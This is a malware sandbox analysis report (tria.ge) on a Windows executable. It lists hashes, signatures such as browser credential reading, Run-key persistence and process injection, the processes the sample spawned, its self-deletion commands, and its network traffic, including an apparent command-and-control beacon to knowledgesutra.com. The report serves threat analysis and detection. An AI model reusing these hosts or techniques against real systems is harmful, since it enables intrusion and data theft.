Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    101s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    04/10/2022, 03:44 UTC

General

  • Target

    df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe

  • Size

    840KB

  • MD5

    024ffc0a906b6ef8618e02c6349b1e61

  • SHA1

    eebb32abf9151f35345869181eb8ffb88f21fabe

  • SHA256

    df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2

  • SHA512

    00982b9809900bb2cc05592c5d03608c43823bab0f377766b476e248c0ff2716041fab3ae7c4c1a9d6527e0e483078207c15e47ec7c7fa0579372c0ee93d27d9

  • SSDEEP

    12288:gCpyvXFPTfnCvX66h/NYJ9nDW6FApNg3gZqdDUtOuBiMc/j6KRVrxn7Nl4+GtlrL:dk9P7nCvX6MNYLIbgYJ3chra+GbrL

Malware Config

Signatures

  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Executes dropped EXE 10 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 54 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\csrss.exe
    %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
    1⤵
    • Executes dropped EXE
    • Drops desktop.ini file(s)
    • Suspicious use of UnmapMainImage
    PID:336
  • C:\Users\Admin\AppData\Local\Temp\df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe
    "C:\Users\Admin\AppData\Local\Temp\df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1392
    • C:\Users\Admin\AppData\Local\Temp\df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe
      "C:\Users\Admin\AppData\Local\Temp\df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Users\Admin\d3WQGzd9.exe
        C:\Users\Admin\d3WQGzd9.exe
        3⤵
        • Modifies visiblity of hidden/system files in Explorer
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Users\Admin\zauda.exe
          "C:\Users\Admin\zauda.exe"
          4⤵
          • Modifies visiblity of hidden/system files in Explorer
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          PID:2020
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c tasklist&&del d3WQGzd9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1316
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1932
      • C:\Users\Admin\awhost.exe
        C:\Users\Admin\awhost.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1952
        • C:\Windows\SysWOW64\svchost.exe
          "C:\Windows\system32\svchost.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1368
      • C:\Users\Admin\bwhost.exe
        C:\Users\Admin\bwhost.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1328
        • C:\Users\Admin\bwhost.exe
          "C:\Users\Admin\bwhost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:984
          • C:\Windows\explorer.exe
            0000003C*
            5⤵
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:880
      • C:\Users\Admin\cwhost.exe
        C:\Users\Admin\cwhost.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Drops file in Program Files directory
        PID:1416
        • C:\Users\Admin\cwhost.exe
          C:\Users\Admin\cwhost.exe startC:\Users\Admin\AppData\Roaming\conhost.exe%C:\Users\Admin\AppData\Roaming
          4⤵
          • Executes dropped EXE
          PID:1620
        • C:\Users\Admin\cwhost.exe
          C:\Users\Admin\cwhost.exe startC:\Users\Admin\AppData\Local\Temp\dwm.exe%C:\Users\Admin\AppData\Local\Temp
          4⤵
          • Executes dropped EXE
          PID:580
      • C:\Users\Admin\dwhost.exe
        C:\Users\Admin\dwhost.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1876
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c tasklist&&del df999d74bf1052d031b84164e5029508528bb76feb7ec14caa6b92abd129f8a2.exe
        3⤵
        • Deletes itself
        PID:1384
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:688
  • C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
    1⤵
    • Loads dropped DLL
    PID:848
  • C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    1⤵
      PID:1060

    Network

    • flag-us
      DNS
      knowledgesutra.com
      cwhost.exe
      Remote address:
      8.8.8.8:53
      Request
      knowledgesutra.com
      IN A
      Response
      knowledgesutra.com
      IN A
      67.227.226.240
    • flag-us
      GET
      http://knowledgesutra.com/img/temp/hi.cgi?v44=47&tq=gHZutDyMv5rJejHia9nrmsl6giWz%2BJZbVyA%3D
      cwhost.exe
      Remote address:
      67.227.226.240:80
      Request
      GET /img/temp/hi.cgi?v44=47&tq=gHZutDyMv5rJejHia9nrmsl6giWz%2BJZbVyA%3D HTTP/1.0
      Connection: close
      Host: knowledgesutra.com
      Accept: */*
      User-Agent: mozilla/2.0
      Response
      HTTP/1.1 200 OK
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
      Content-Type: text/html; charset=UTF-8
      Date: Tue, 04 Oct 2022 12:23:06 GMT
      Connection: close
      X-Powered-By: PHP/5.4.16
    • flag-us
      DNS
      onlinehelptoall.com
      cwhost.exe
      Remote address:
      8.8.8.8:53
      Request
      onlinehelptoall.com
      IN A
      Response
    • flag-us
      DNS
      yourmediaspace.com
      cwhost.exe
      Remote address:
      8.8.8.8:53
      Request
      yourmediaspace.com
      IN A
      Response
    • flag-nl
      GET
      http://www.google.com/
      cwhost.exe
      Remote address:
      216.58.208.100:80
      Request
      GET / HTTP/1.0
      Connection: close
      Host: www.google.com
      Accept: */*
      Response
      HTTP/1.0 302 Found
      Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaPUcyGOfL8JkGIhAUWF52OOZeK0u8_SIL6kK9MgFy
      Date: Tue, 04 Oct 2022 12:24:07 GMT
      Pragma: no-cache
      Expires: Fri, 01 Jan 1990 00:00:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Content-Type: text/html; charset=UTF-8
      Server: HTTP server (unknown)
      Content-Length: 313
      X-XSS-Protection: 0
    • flag-us
      DNS
      onlinefilepanel.com
      cwhost.exe
      Remote address:
      8.8.8.8:53
      Request
      onlinefilepanel.com
      IN A
      Response
    • flag-nl
      GET
      http://www.google.com/
      cwhost.exe
      Remote address:
      216.58.208.100:80
      Request
      GET / HTTP/1.1
      Connection: close
      Pragma: no-cache
      Host: www.google.com
      Response
      HTTP/1.1 302 Found
      Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaPUcyGO_L8JkGIhCBsyPyca7d0HsSSS-rasgBMgFy
      Date: Tue, 04 Oct 2022 12:24:15 GMT
      Pragma: no-cache
      Expires: Fri, 01 Jan 1990 00:00:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Content-Type: text/html; charset=UTF-8
      Server: HTTP server (unknown)
      Content-Length: 313
      X-XSS-Protection: 0
      Connection: close
    • flag-nl
      GET
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaPUcyGO_L8JkGIhCBsyPyca7d0HsSSS-rasgBMgFy
      cwhost.exe
      Remote address:
      216.58.208.100:80
      Request
      GET /sorry/index?continue=http://www.google.com/&q=EgSaPUcyGO_L8JkGIhCBsyPyca7d0HsSSS-rasgBMgFy HTTP/1.1
      Connection: close
      Pragma: no-cache
      Host: www.google.com
      Response
      HTTP/1.1 429 Too Many Requests
      Date: Tue, 04 Oct 2022 12:24:16 GMT
      Pragma: no-cache
      Expires: Fri, 01 Jan 1990 00:00:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Content-Type: text/html
      Server: HTTP server (unknown)
      Content-Length: 2951
      X-XSS-Protection: 0
      Connection: close
    • 127.0.0.1:80
      explorer.exe
    • 127.0.0.1:80
      explorer.exe
    • 127.0.0.1:80
      explorer.exe
    • 67.227.226.240:80
      http://knowledgesutra.com/img/temp/hi.cgi?v44=47&tq=gHZutDyMv5rJejHia9nrmsl6giWz%2BJZbVyA%3D
      http
      cwhost.exe
      443 B
      2.4kB
      6
      7

      HTTP Request

      GET http://knowledgesutra.com/img/temp/hi.cgi?v44=47&tq=gHZutDyMv5rJejHia9nrmsl6giWz%2BJZbVyA%3D

      HTTP Response

      200
    • 216.58.208.100:80
      http://www.google.com/
      http
      cwhost.exe
      302 B
      931 B
      5
      5

      HTTP Request

      GET http://www.google.com/

      HTTP Response

      302
    • 127.0.0.1:61030
      cwhost.exe
    • 216.58.208.100:80
      http://www.google.com/
      http
      cwhost.exe
      307 B
      950 B
      5
      5

      HTTP Request

      GET http://www.google.com/

      HTTP Response

      302
    • 216.58.208.100:80
      http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaPUcyGO_L8JkGIhCBsyPyca7d0HsSSS-rasgBMgFy
      http
      cwhost.exe
      489 B
      3.5kB
      7
      7

      HTTP Request

      GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaPUcyGO_L8JkGIhCBsyPyca7d0HsSSS-rasgBMgFy

      HTTP Response

      429
    • 127.0.0.1:61030
      cwhost.exe
    • 8.8.8.8:53
      knowledgesutra.com
      dns
      cwhost.exe
      64 B
      80 B
      1
      1

      DNS Request

      knowledgesutra.com

      DNS Response

      67.227.226.240

    • 8.8.8.8:53
      onlinehelptoall.com
      dns
      cwhost.exe
      65 B
      138 B
      1
      1

      DNS Request

      onlinehelptoall.com

    • 8.8.8.8:53
      yourmediaspace.com
      dns
      cwhost.exe
      64 B
      64 B
      1
      1

      DNS Request

      yourmediaspace.com

    • 8.8.8.8:53
      onlinefilepanel.com
      dns
      cwhost.exe
      65 B
      138 B
      1
      1

      DNS Request

      onlinefilepanel.com

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\awhost.exe

      Filesize

      68KB

      MD5

      b0406fa1f1b4a471ce4c1521708d1ef3

      SHA1

      bd2bb68d92c8b6af7604d52e336152bc48ea1227

      SHA256

      ef2abd7d609bba1f141b3e1dc6a79d937fe68e37d51b093fc29e0d800bf6fa29

      SHA512

      07bec70b25b083919a91de4930842ba8b264e869d0251134cbfecbc9227be704c70600c9db878eee08f7d1fa1df6c848577b632f810b014d62ace26b961bb2cc

    • C:\Users\Admin\awhost.exe

      Filesize

      68KB

      MD5

      b0406fa1f1b4a471ce4c1521708d1ef3

      SHA1

      bd2bb68d92c8b6af7604d52e336152bc48ea1227

      SHA256

      ef2abd7d609bba1f141b3e1dc6a79d937fe68e37d51b093fc29e0d800bf6fa29

      SHA512

      07bec70b25b083919a91de4930842ba8b264e869d0251134cbfecbc9227be704c70600c9db878eee08f7d1fa1df6c848577b632f810b014d62ace26b961bb2cc

    • C:\Users\Admin\bwhost.exe

      Filesize

      136KB

      MD5

      acaf206a193335d7983a46a8c9e18fea

      SHA1

      3a33b8148c23887c2b9edc2d0dbec3d83398069b

      SHA256

      8aa2fb2e061fc4a30160f912db3f1ea75189d16d922f82aba6538e92c4df47ca

      SHA512

      846622efa83273ce9f40f38953077eca4a6f064923a8cf9b202d19cac9fac4c8e58007f2531fafafb6b408787d0ed23a3349b49794d0311736efa35bba6fba10

    • C:\Users\Admin\bwhost.exe

      Filesize

      136KB

      MD5

      acaf206a193335d7983a46a8c9e18fea

      SHA1

      3a33b8148c23887c2b9edc2d0dbec3d83398069b

      SHA256

      8aa2fb2e061fc4a30160f912db3f1ea75189d16d922f82aba6538e92c4df47ca

      SHA512

      846622efa83273ce9f40f38953077eca4a6f064923a8cf9b202d19cac9fac4c8e58007f2531fafafb6b408787d0ed23a3349b49794d0311736efa35bba6fba10

    • C:\Users\Admin\bwhost.exe

      Filesize

      136KB

      MD5

      acaf206a193335d7983a46a8c9e18fea

      SHA1

      3a33b8148c23887c2b9edc2d0dbec3d83398069b

      SHA256

      8aa2fb2e061fc4a30160f912db3f1ea75189d16d922f82aba6538e92c4df47ca

      SHA512

      846622efa83273ce9f40f38953077eca4a6f064923a8cf9b202d19cac9fac4c8e58007f2531fafafb6b408787d0ed23a3349b49794d0311736efa35bba6fba10

    • C:\Users\Admin\cwhost.exe

      Filesize

      170KB

      MD5

      40d9607cb66da11b9adfec5b93b8b311

      SHA1

      55bf463cd5c0c90ba92935ef81ae47ab3bc5fea6

      SHA256

      033e60eebb966b3bcfbe27fa3e99e8f393970f320b5cc25cb16517869eb5f3e6

      SHA512

      e764053de1c2444e61e638e67e91cf7d9d968df4d60b8bcc3f5ddfc317edb1f14e950d096d451fa372a699fc886125066f4e2f2de171641433ce1e066aa58078

    • C:\Users\Admin\cwhost.exe

      Filesize

      170KB

      MD5

      40d9607cb66da11b9adfec5b93b8b311

      SHA1

      55bf463cd5c0c90ba92935ef81ae47ab3bc5fea6

      SHA256

      033e60eebb966b3bcfbe27fa3e99e8f393970f320b5cc25cb16517869eb5f3e6

      SHA512

      e764053de1c2444e61e638e67e91cf7d9d968df4d60b8bcc3f5ddfc317edb1f14e950d096d451fa372a699fc886125066f4e2f2de171641433ce1e066aa58078

    • C:\Users\Admin\cwhost.exe

      Filesize

      170KB

      MD5

      40d9607cb66da11b9adfec5b93b8b311

      SHA1

      55bf463cd5c0c90ba92935ef81ae47ab3bc5fea6

      SHA256

      033e60eebb966b3bcfbe27fa3e99e8f393970f320b5cc25cb16517869eb5f3e6

      SHA512

      e764053de1c2444e61e638e67e91cf7d9d968df4d60b8bcc3f5ddfc317edb1f14e950d096d451fa372a699fc886125066f4e2f2de171641433ce1e066aa58078

    • C:\Users\Admin\cwhost.exe

      Filesize

      170KB

      MD5

      40d9607cb66da11b9adfec5b93b8b311

      SHA1

      55bf463cd5c0c90ba92935ef81ae47ab3bc5fea6

      SHA256

      033e60eebb966b3bcfbe27fa3e99e8f393970f320b5cc25cb16517869eb5f3e6

      SHA512

      e764053de1c2444e61e638e67e91cf7d9d968df4d60b8bcc3f5ddfc317edb1f14e950d096d451fa372a699fc886125066f4e2f2de171641433ce1e066aa58078

    • C:\Users\Admin\d3WQGzd9.exe

      Filesize

      364KB

      MD5

      db406d87e556a0008c18429ecf3cc93a

      SHA1

      3a1b7a87080bf1d78fca904bd7515833bbd380e8

      SHA256

      2712b4f742a53c7d4b9a55c8f760447a26925c10a3ca6c10b84dea49482a2768

      SHA512

      e0da870b0c8f8955277b9227ef3de2b4d3e45d37986ac9a9b445e24506f265020f071365a2135b1e2892aaa64c3b7477d6c4a57598f3601655d74d92d6222354

    • C:\Users\Admin\d3WQGzd9.exe

      Filesize

      364KB

      MD5

      db406d87e556a0008c18429ecf3cc93a

      SHA1

      3a1b7a87080bf1d78fca904bd7515833bbd380e8

      SHA256

      2712b4f742a53c7d4b9a55c8f760447a26925c10a3ca6c10b84dea49482a2768

      SHA512

      e0da870b0c8f8955277b9227ef3de2b4d3e45d37986ac9a9b445e24506f265020f071365a2135b1e2892aaa64c3b7477d6c4a57598f3601655d74d92d6222354

    • C:\Users\Admin\dwhost.exe

      Filesize

      24KB

      MD5

      aaa893d374547f20f7fdd7c3b6c56b36

      SHA1

      f7aab7bd60af5e948b71abcccbcfb1d62f6580ff

      SHA256

      17c950477ffd3e28c4135c4cc5711589415129c7b21c4af1e89deaf68f043d03

      SHA512

      491b88e809425dd20dc9052fe45ab101ccb803c186a27d6502bf1cbefa8d903d51f72c02e604ec346f77b85c4324daa036341a42fcba0a96e5c69781ebfecb31

    • C:\Users\Admin\zauda.exe

      Filesize

      364KB

      MD5

      b94829f71bf0c5842ea78aa0b976c129

      SHA1

      3c1b0d7b45ecbd2069a722ab9c1549c299c86c89

      SHA256

      cffed0c3fe5e9f34e1d9364bef53f9216cb13baae2d865e4f09a8651d864b8b2

      SHA512

      f2b72b15386d735590a3593a6adb4bd88d7acb634b6e4b3f75823e4fac11aa4c56bae222355eeb395f8c9f9c5d375fe57f76ac82fc9666a2f68f9d1a9c469384

    • C:\Users\Admin\zauda.exe

      Filesize

      364KB

      MD5

      b94829f71bf0c5842ea78aa0b976c129

      SHA1

      3c1b0d7b45ecbd2069a722ab9c1549c299c86c89

      SHA256

      cffed0c3fe5e9f34e1d9364bef53f9216cb13baae2d865e4f09a8651d864b8b2

      SHA512

      f2b72b15386d735590a3593a6adb4bd88d7acb634b6e4b3f75823e4fac11aa4c56bae222355eeb395f8c9f9c5d375fe57f76ac82fc9666a2f68f9d1a9c469384

    • C:\Windows\system32\consrv.DLL

      Filesize

      53KB

      MD5

      68689b2e7472e2cfb3f39da8a59505d9

      SHA1

      5be15784ab1193dc13ac24ec1efcabded5fe2df4

      SHA256

      f304eb2cf6479a4fb36fef81c6df4d0225e251002e8f06f26ee196210bf3d168

      SHA512

      269999061cd54b23b92d385689682e687ae9030bc5d26d79dd5e99f72fa4b4eef41f5a7b555325bd558771db92e2feb8a67fb40c87223be9e23ccb498b3bbc88

    • \Users\Admin\awhost.exe

      Filesize

      68KB

      MD5

      b0406fa1f1b4a471ce4c1521708d1ef3

      SHA1

      bd2bb68d92c8b6af7604d52e336152bc48ea1227

      SHA256

      ef2abd7d609bba1f141b3e1dc6a79d937fe68e37d51b093fc29e0d800bf6fa29

      SHA512

      07bec70b25b083919a91de4930842ba8b264e869d0251134cbfecbc9227be704c70600c9db878eee08f7d1fa1df6c848577b632f810b014d62ace26b961bb2cc

    • \Users\Admin\awhost.exe

      Filesize

      68KB

      MD5

      b0406fa1f1b4a471ce4c1521708d1ef3

      SHA1

      bd2bb68d92c8b6af7604d52e336152bc48ea1227

      SHA256

      ef2abd7d609bba1f141b3e1dc6a79d937fe68e37d51b093fc29e0d800bf6fa29

      SHA512

      07bec70b25b083919a91de4930842ba8b264e869d0251134cbfecbc9227be704c70600c9db878eee08f7d1fa1df6c848577b632f810b014d62ace26b961bb2cc

    • \Users\Admin\bwhost.exe

      Filesize

      136KB

      MD5

      acaf206a193335d7983a46a8c9e18fea

      SHA1

      3a33b8148c23887c2b9edc2d0dbec3d83398069b

      SHA256

      8aa2fb2e061fc4a30160f912db3f1ea75189d16d922f82aba6538e92c4df47ca

      SHA512

      846622efa83273ce9f40f38953077eca4a6f064923a8cf9b202d19cac9fac4c8e58007f2531fafafb6b408787d0ed23a3349b49794d0311736efa35bba6fba10

    • \Users\Admin\bwhost.exe

      Filesize

      136KB

      MD5

      acaf206a193335d7983a46a8c9e18fea

      SHA1

      3a33b8148c23887c2b9edc2d0dbec3d83398069b

      SHA256

      8aa2fb2e061fc4a30160f912db3f1ea75189d16d922f82aba6538e92c4df47ca

      SHA512

      846622efa83273ce9f40f38953077eca4a6f064923a8cf9b202d19cac9fac4c8e58007f2531fafafb6b408787d0ed23a3349b49794d0311736efa35bba6fba10

    • \Users\Admin\cwhost.exe

      Filesize

      170KB

      MD5

      40d9607cb66da11b9adfec5b93b8b311

      SHA1

      55bf463cd5c0c90ba92935ef81ae47ab3bc5fea6

      SHA256

      033e60eebb966b3bcfbe27fa3e99e8f393970f320b5cc25cb16517869eb5f3e6

      SHA512

      e764053de1c2444e61e638e67e91cf7d9d968df4d60b8bcc3f5ddfc317edb1f14e950d096d451fa372a699fc886125066f4e2f2de171641433ce1e066aa58078

    • \Users\Admin\cwhost.exe

      Filesize

      170KB

      MD5

      40d9607cb66da11b9adfec5b93b8b311

      SHA1

      55bf463cd5c0c90ba92935ef81ae47ab3bc5fea6

      SHA256

      033e60eebb966b3bcfbe27fa3e99e8f393970f320b5cc25cb16517869eb5f3e6

      SHA512

      e764053de1c2444e61e638e67e91cf7d9d968df4d60b8bcc3f5ddfc317edb1f14e950d096d451fa372a699fc886125066f4e2f2de171641433ce1e066aa58078

    • \Users\Admin\d3WQGzd9.exe

      Filesize

      364KB

      MD5

      db406d87e556a0008c18429ecf3cc93a

      SHA1

      3a1b7a87080bf1d78fca904bd7515833bbd380e8

      SHA256

      2712b4f742a53c7d4b9a55c8f760447a26925c10a3ca6c10b84dea49482a2768

      SHA512

      e0da870b0c8f8955277b9227ef3de2b4d3e45d37986ac9a9b445e24506f265020f071365a2135b1e2892aaa64c3b7477d6c4a57598f3601655d74d92d6222354

    • \Users\Admin\d3WQGzd9.exe

      Filesize

      364KB

      MD5

      db406d87e556a0008c18429ecf3cc93a

      SHA1

      3a1b7a87080bf1d78fca904bd7515833bbd380e8

      SHA256

      2712b4f742a53c7d4b9a55c8f760447a26925c10a3ca6c10b84dea49482a2768

      SHA512

      e0da870b0c8f8955277b9227ef3de2b4d3e45d37986ac9a9b445e24506f265020f071365a2135b1e2892aaa64c3b7477d6c4a57598f3601655d74d92d6222354

    • \Users\Admin\dwhost.exe

      Filesize

      24KB

      MD5

      aaa893d374547f20f7fdd7c3b6c56b36

      SHA1

      f7aab7bd60af5e948b71abcccbcfb1d62f6580ff

      SHA256

      17c950477ffd3e28c4135c4cc5711589415129c7b21c4af1e89deaf68f043d03

      SHA512

      491b88e809425dd20dc9052fe45ab101ccb803c186a27d6502bf1cbefa8d903d51f72c02e604ec346f77b85c4324daa036341a42fcba0a96e5c69781ebfecb31

    • \Users\Admin\dwhost.exe

      Filesize

      24KB

      MD5

      aaa893d374547f20f7fdd7c3b6c56b36

      SHA1

      f7aab7bd60af5e948b71abcccbcfb1d62f6580ff

      SHA256

      17c950477ffd3e28c4135c4cc5711589415129c7b21c4af1e89deaf68f043d03

      SHA512

      491b88e809425dd20dc9052fe45ab101ccb803c186a27d6502bf1cbefa8d903d51f72c02e604ec346f77b85c4324daa036341a42fcba0a96e5c69781ebfecb31

    • \Users\Admin\zauda.exe

      Filesize

      364KB

      MD5

      b94829f71bf0c5842ea78aa0b976c129

      SHA1

      3c1b0d7b45ecbd2069a722ab9c1549c299c86c89

      SHA256

      cffed0c3fe5e9f34e1d9364bef53f9216cb13baae2d865e4f09a8651d864b8b2

      SHA512

      f2b72b15386d735590a3593a6adb4bd88d7acb634b6e4b3f75823e4fac11aa4c56bae222355eeb395f8c9f9c5d375fe57f76ac82fc9666a2f68f9d1a9c469384

    • \Users\Admin\zauda.exe

      Filesize

      364KB

      MD5

      b94829f71bf0c5842ea78aa0b976c129

      SHA1

      3c1b0d7b45ecbd2069a722ab9c1549c299c86c89

      SHA256

      cffed0c3fe5e9f34e1d9364bef53f9216cb13baae2d865e4f09a8651d864b8b2

      SHA512

      f2b72b15386d735590a3593a6adb4bd88d7acb634b6e4b3f75823e4fac11aa4c56bae222355eeb395f8c9f9c5d375fe57f76ac82fc9666a2f68f9d1a9c469384

    • \Windows\System32\consrv.dll

      Filesize

      53KB

      MD5

      68689b2e7472e2cfb3f39da8a59505d9

      SHA1

      5be15784ab1193dc13ac24ec1efcabded5fe2df4

      SHA256

      f304eb2cf6479a4fb36fef81c6df4d0225e251002e8f06f26ee196210bf3d168

      SHA512

      269999061cd54b23b92d385689682e687ae9030bc5d26d79dd5e99f72fa4b4eef41f5a7b555325bd558771db92e2feb8a67fb40c87223be9e23ccb498b3bbc88

    • \Windows\assembly\GAC_32\Desktop.ini

      Filesize

      4KB

      MD5

      ff7d5ec20bf73c02317e7a740fffe018

      SHA1

      365ac8cfe5b939854cc1c341caf051bcc45f9372

      SHA256

      1e230847d7034f5ab3bf010f569315e00673859af0574fc9f915636ed905779a

      SHA512

      30854c0d703fd7c6cbc0769d9be4125baa2577ec529d5e48177a434685b66752fd79c50f0321324e23eeb985738f403347748afefae7d8a3bfad388a5b512a44

    • \Windows\assembly\GAC_64\Desktop.ini

      Filesize

      5KB

      MD5

      3e7a118b119428247edfc5d5ef3761bc

      SHA1

      140e4cb00107678160411f016c4c17611580a209

      SHA256

      97c19f4103a16798202e50a501375d0bf3d7ec1bb654dda230337e85b01b1ec5

      SHA512

      b0e27a4d7aa62f937f275b9f413f75857846ae670bf3aed6e55c1db865485fda89e33dcdffa02ae2ab25f48d5f63f869232f9e6d69f9cdc8a5c93f39de09a925

    • memory/336-145-0x0000000001F00000-0x0000000001F12000-memory.dmp

      Filesize

      72KB

    • memory/336-157-0x0000000001F00000-0x0000000001F12000-memory.dmp

      Filesize

      72KB

    • memory/580-164-0x0000000000540000-0x0000000000558000-memory.dmp

      Filesize

      96KB

    • memory/580-163-0x0000000000400000-0x0000000000449000-memory.dmp

      Filesize

      292KB

    • memory/880-132-0x0000000000060000-0x0000000000075000-memory.dmp

      Filesize

      84KB

    • memory/880-137-0x0000000001B20000-0x0000000001B39000-memory.dmp

      Filesize

      100KB

    • memory/880-131-0x0000000001B20000-0x0000000001B39000-memory.dmp

      Filesize

      100KB

    • memory/880-126-0x0000000001B20000-0x0000000001B39000-memory.dmp

      Filesize

      100KB

    • memory/984-118-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-114-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-119-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-120-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-117-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-124-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/984-115-0x0000000000400000-0x000000000041B000-memory.dmp

      Filesize

      108KB

    • memory/1032-172-0x0000000002780000-0x000000000323A000-memory.dmp

      Filesize

      10.7MB

    • memory/1032-174-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-67-0x0000000075601000-0x0000000075603000-memory.dmp

      Filesize

      8KB

    • memory/1032-138-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-62-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-57-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-59-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-68-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1032-56-0x0000000000400000-0x00000000004C4000-memory.dmp

      Filesize

      784KB

    • memory/1368-100-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-98-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-101-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-95-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-94-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-102-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-105-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-97-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1368-106-0x0000000000400000-0x000000000040B000-memory.dmp

      Filesize

      44KB

    • memory/1416-148-0x0000000000400000-0x0000000000449000-memory.dmp

      Filesize

      292KB

    • memory/1416-159-0x00000000008D0000-0x00000000008E8000-memory.dmp

      Filesize

      96KB

    • memory/1416-158-0x0000000000400000-0x0000000000449000-memory.dmp

      Filesize

      292KB

